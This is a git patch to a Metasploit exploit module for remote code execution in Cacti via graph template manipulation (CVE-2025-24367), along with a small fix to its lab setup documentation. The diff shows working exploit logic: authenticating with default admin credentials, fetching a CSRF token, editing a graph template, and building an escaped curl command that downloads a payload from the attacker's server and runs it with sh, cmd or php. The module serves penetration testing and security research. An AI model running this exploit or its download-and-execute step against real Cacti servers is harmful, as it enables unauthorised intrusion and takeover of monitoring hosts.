From b6da204725bb35ddbccbd7b82004b1dc383dc8cb Mon Sep 17 00:00:00 2001
From: jheysel-r7 <Jack_Heysel@rapid7.com>
Date: Wed, 21 Jan 2026 10:09:12 -0800
Subject: [PATCH] Apply suggestions from code review

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
---
 .../multi/http/cacti_graph_template_rce.md    |  2 +-
 .../multi/http/cacti_graph_template_rce.rb    | 41 ++++++++-----------
 2 files changed, 17 insertions(+), 26 deletions(-)

diff --git a/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md b/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
index 82f220251a..eafd0f00e9 100644
--- a/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
+++ b/documentation/modules/exploit/multi/http/cacti_graph_template_rce.md
@@ -106,7 +106,7 @@ $cacti_db_session = false;
 $disable_log_rotation = false;
 ```
 - Run `docker-compose up`
-- Access http://127.0.0.1:8080
+- Access http://127.0.0.1:8080/cacti
 - Login with the `admin` user (password: `admin`)
 - Follow the installation steps (accept every default settings and ignore the pre-installation checks suggestions)
 
diff --git a/modules/exploits/multi/http/cacti_graph_template_rce.rb b/modules/exploits/multi/http/cacti_graph_template_rce.rb
index b81777313d..64b8c5028f 100644
--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -42,29 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq'],
           [ 'CVE', '2025-24367'],
         ],
-        'Platform' => %w[unix linux php],
         'Privileged' => false,
-        'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [
           [
-            'Linux Command',
+            'Linux',
             {
-              'Arch' => ARCH_CMD,
-              'Platform' => [ 'unix', 'linux' ]
+              'Arch' => [ARCH_CMD, ARCH_PHP],
+              'Platform' => [ 'unix', 'linux', 'php' ],
+              # The graph template id 226 corresponds to "Linux - Logged on users"
+              'TemplateId' => 226
             }
           ],
           [
-            'PHP',
+            'Windows',
             {
-              'Arch' => ARCH_PHP,
-              'Platform' => 'php'
-            }
-          ],
-          [
-            'Windows Command',
-            {
-              'Arch' => ARCH_CMD,
-              'Platform' => 'win'
+              'Arch' => [ARCH_CMD, ARCH_PHP],
+              'Platform' => [ 'win', 'php' ],
+              # The graph template id 197 corresponds to "Host MIB - Logged in Users"
+              'TemplateId' => 197
             }
           ]
         ],
@@ -86,10 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
         OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']),
-        # Allow the operator to define the TEMPLATE_ID for when they're exploiting the PHP target.
-        # The graph template id 226 corresponds to "Linux - Logged on users", where 197 is "Host MIB - Logged in Users"
-        # Both of those templates correspond to local_graph_id=3 on a default Cacti installation for both Window and Linux.
-        OptInt.new('TEMPLATE_ID', [ true, 'The graph template ID to modify. If exploiting a Linux target set to 226, if Windows set to 197' ])
       ]
     )
   end
@@ -133,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def csrf_magic_token
-    template_url = normalize_uri(target_uri.path, '/graph_templates.php?action=template_edit&id=' + datastore['TEMPLATE_ID'].to_s)
+    template_url = normalize_uri(target_uri.path, '/graph_templates.php?action=template_edit&id=' + target['TemplateId'].to_s)
     res = send_request_cgi({
       'uri' => template_url,
       'method' => 'GET',
@@ -166,8 +157,8 @@ class MetasploitModule < Msf::Exploit::Remote
     data = {
       '__csrf_magic' => csrf_magic,
       'name' => 'Host MIB - Logged in Users',
-      'graph_template_id' => datastore['TEMPLATE_ID'],
-      'graph_template_graph_id' => datastore['TEMPLATE_ID'],
+      'graph_template_id' => target['TemplateId'],
+      'graph_template_graph_id' => target['TemplateId'],
       'save_component_template' => '1',
       'title' => '|host_description| - Logged in Users',
       'vertical_label' => 'percent',
@@ -298,11 +289,10 @@ class MetasploitModule < Msf::Exploit::Remote
     authenticate
     hosted_payload_name = Rex::Text.rand_text_alpha_lower(1)
     start_service('Path' => "/#{hosted_payload_name}")
-    if target.arch.first == ARCH_CMD
-      if target['Platform'] == 'win'
+    if payload.arch.first == ARCH_CMD
+      if target.name == 'Windows'
         on_disk_payload_name = "#{Rex::Text.rand_text_alpha_lower(1)}.bat"
         execute_payload_command = "cmd\\x20/c\\x20#{on_disk_payload_name}"
-        print_status("win command #{execute_payload_command}")
       else
         on_disk_payload_name = Rex::Text.rand_text_alpha_lower(1)
         execute_payload_command = "sh\\x20#{on_disk_payload_name}"
@@ -311,6 +301,7 @@ class MetasploitModule < Msf::Exploit::Remote
       on_disk_payload_name = "#{Rex::Text.rand_text_alpha_lower(1)}.php"
       execute_payload_command = "php\\x20#{on_disk_payload_name}"
     end
+    vprint_status("Payload execution command: #{execute_payload_command}")
 
     upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
     upload_stage(upload_payload_command)